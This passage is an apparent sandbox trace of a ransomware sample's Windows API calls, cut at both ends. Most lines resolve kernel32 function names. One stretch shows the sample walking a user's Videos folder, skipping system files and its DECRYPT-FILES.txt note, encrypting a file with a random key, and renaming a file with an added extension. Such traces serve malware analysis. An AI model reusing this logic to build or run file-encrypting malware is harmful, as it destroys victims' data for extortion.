lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.460] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.460] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.460] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.461] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.461] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.461] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.461] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.461] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.461] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.461] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.461] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.461] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.461] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.461] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.461] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.461] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.461] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.461] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.461] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.461] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.461] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.462] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.462] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.462] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\NbYe.swf") returned 62 [0087.462] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\NbYe.swf.ICsc7") returned 68 [0087.462] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\NbYe.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\nbye.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\NbYe.swf.ICsc7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\nbye.swf.icsc7"), dwFlags=0x0) returned 1 [0087.462] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.463] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.463] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.463] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59fbdcc0, ftCreationTime.dwHighDateTime=0x1d4c701, ftLastAccessTime.dwLowDateTime=0x998c0470, ftLastAccessTime.dwHighDateTime=0x1d4c8d0, ftLastWriteTime.dwLowDateTime=0x998c0470, ftLastWriteTime.dwHighDateTime=0x1d4c8d0, nFileSizeHigh=0x0, nFileSizeLow=0x16ee9, dwReserved0=0x0, dwReserved1=0x0, cFileName="PTN5D3Sq_RRMjfg.flv", cAlternateFileName="PTN5D3~1.FLV")) returned 1 [0087.463] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv", lpString2="DECRYPT-FILES.txt") returned 1 [0087.463] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv", lpString2="autorun.inf") returned 1 [0087.463] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv", lpString2="boot.ini") returned 1 [0087.463] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv", lpString2="desktop.ini") returned 1 [0087.463] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv", lpString2="ntuser.dat") returned 1 [0087.463] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv", lpString2="iconcache.db") returned 1 [0087.463] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv", lpString2="bootsect.bak") returned 1 [0087.463] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv", lpString2="ntuser.dat.log") returned 1 [0087.463] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv", lpString2="thumbs.db") returned -1 [0087.463] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv", lpString2="Bootfont.bin") returned 1 [0087.463] lstrlenW (lpString="PTN5D3Sq_RRMjfg.flv") returned 19 [0087.463] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.463] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.464] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.464] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.464] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.464] lstrlenW (lpString="PTN5D3Sq_RRMjfg.flv") returned 19 [0087.464] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.464] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="PTN5D3Sq_RRMjfg.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\PTN5D3Sq_RRMjfg.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\PTN5D3Sq_RRMjfg.flv" [0087.464] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\PTN5D3Sq_RRMjfg.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ptn5d3sq_rrmjfg.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.464] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=93929) returned 1 [0087.464] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.464] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.464] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.464] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.464] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.465] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.465] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0087.467] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.467] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.468] CloseHandle (hObject=0x42c) returned 1 [0087.468] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.468] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.469] CloseHandle (hObject=0x0) returned 0 [0087.469] CloseHandle (hObject=0x428) returned 1 [0087.469] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.469] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.469] GetTickCount () returned 0x114e502 [0087.469] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.470] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.470] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.470] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.470] lstrlenA (lpString="kernel32.dll") returned 12 [0087.470] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.470] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.470] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.470] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.471] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.471] lstrlenA (lpString="ADDATOMA") returned 8 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.471] lstrlenA (lpString="ADDATOMW") returned 8 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.471] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.471] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.471] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.471] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.471] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.471] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.471] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.471] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.471] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.471] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.471] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.471] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.471] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.471] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.471] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.471] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.471] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.472] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.472] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.472] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.472] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.472] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.472] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.472] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.472] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.472] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.472] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.472] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.472] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.472] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.472] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.472] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.472] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.472] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.472] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.473] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.473] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.473] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.473] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.473] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.473] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.473] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.473] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.473] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.473] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.473] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.473] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.473] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.473] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.473] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.473] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.473] lstrlenA (lpString="BEEP") returned 4 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.473] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.473] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.473] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.474] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.474] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.474] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.474] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.474] lstrlenA 